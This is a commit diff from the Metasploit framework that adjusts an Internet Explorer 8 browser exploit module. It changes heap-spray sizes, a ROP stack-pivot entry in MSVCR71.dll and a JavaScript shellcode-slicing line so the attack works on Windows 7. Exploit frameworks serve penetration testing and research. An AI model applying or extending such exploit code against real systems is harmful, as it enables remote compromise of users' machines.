Found an instance that causes the win 7 target to fail. This fix corrects it.

git-svn-id: file:///home/svn/framework3/trunk@13797 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Wei Chen 2011-09-27 08:55:07 +00:00
parent a82adb14f9
commit 2b3a277124
1 changed files with 4 additions and 3 deletions

View File

@ -109,8 +109,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Pivot' => 0x7c348b05, #XCHG EAX,ESP; RETN (MSVCR71.dll)
'Offset1' => '0x5F4', #Offset for rop+payload
'Offset2' => '0x02', #Offset to 0x11111110
'Max1' => '0x150', #First spray
'Max2' => '0x200' #Second spray
'Max1' => '0x101', #First spray
'Max2' => '0x300' #Second spray
}
]
],
@ -123,6 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', true])
], self.class
)
end
def exploit
@ -232,7 +233,7 @@ class Metasploit3 < Msf::Exploit::Remote
#Extract string based on target
if my_target.name == 'IE 8 on Windows 7'
js_extract_str = "var block = shellcode.substring(0, (0x7ffc0-6)/2);"
js_extract_str = "var block = shellcode.substring(0, (0x7ff00-6)/2);"
elsif my_target.name == 'IE 8 on Windows XP SP3'
js_extract_str = "var block = shellcode.substring(2, (0x40000-0x21)/2);"
else